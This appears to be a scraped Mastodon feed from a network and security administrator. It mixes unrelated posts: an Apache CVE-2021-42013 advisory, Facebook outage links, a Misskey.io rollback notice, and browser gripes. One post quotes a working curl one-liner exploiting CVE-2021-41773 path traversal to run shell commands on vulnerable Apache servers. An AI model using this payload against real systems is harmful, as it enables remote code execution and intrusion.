Silver lining for the clean slate: development has been paralyzed because I need to upgrade it to the new activitypub back end I wrote, activitypub-express, but I've been putting it off because it would require writing a difficult database migration to preserve the existing groups
"[...] Facebook sent me a cease-and-desist letter. The company demanded that I take down the tool. It also told me that it had permanently disabled my Facebook account ... Pointing to a provision in its terms of service that purports to bind even former users of Facebook, Facebook also demanded that I never again create a tool that interacts with Facebook or its many other services in any way."
(Note: No need to share that you deleted your account, sport. So did I.)
Oh, you now get like an actual warning on the Windows Update screen?
Subject: [oss-security] CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)
It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.
Ah, that over there was the CVE-2021-41773 Apache httpd 2.4.49 with mod-cgi PoC a couple of days ago: https://mobile.twitter.com/hackerfantastic/status/1445531829985968137
curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
(Slightly optimized version from down that thread.)
Sure been a long time since I saw one of those 🙄
Not quite sure why Vivaldi on Linux immediately closes on Ctrl+q, even though "show exit confirmation dialog" is ticked in the settings...
Second time this hit me this week when I missed Ctrl+w (close tab) right next to it.
Yeah, I know, not a novel problem... No idea why it's coming up for me right now.
Stephen Colebourne's blog: Big problems at the timezone database
Lots of people are asking me how I make these drawings.
I begin by coding the 3d environment by hand in Moogle, I then export a bit map of the wireframe, I then open it in Noodle and clean up the lines.
Morgen ist wieder #MatchingMittwoch. Bis Ende des Jahres werden an jedem 1. Mittwoch des Monats alle Einzelspenden von #betterplaceOrg mit 10% verstärkt! Wir freuen uns sehr, wenn ihr uns mit eurer #Spende unterstützt.
Here is your regular reminder that text messages (SMS) are neither private nor secure. This company handles billions of messages, yet it only managed to detect a hack after five years and doesn’t bother to disclose the scope of the breach. (Via @firstname.lastname@example.org)
CloudFlare blog as a good write-up:
(reminder, CloudFlare is part of the problem, not of the solution)
...while you can't (yet) log back in, you can read their peering automation block post from a couple of months back: https://engineering.fb.com/2021/05/20/networking-traffic/peering-automation/
As a result of a critical system failure on October 3rd of 2021, Misskey.io's has been rolled back to a backup made on April 4th of 2021.
In accordance with this, all account data has also been reset to the state it was in at the point this backup was made. We are greatly sorry for the inconvenience, but would like to ask users of remote instances that have followed users from Misskey.io between the above stated timespan to please cancel and re-follow the users that they have followed, as while it may seem like you are following them, this is not being correctly reflected.
Additionally, we would be happy if you could please spread the news of this post to as many people as you are able to.
Once again, we sincerely apologize for the great trouble caused by this incident and ask for both understanding and cooperation in this matter.
generic computer and internetworking geek
network and systems administration, infosec, retrocomputing
The social network of the future: No ads, no corporate surveillance, ethical design, and decentralization! Own your data with Mastodon!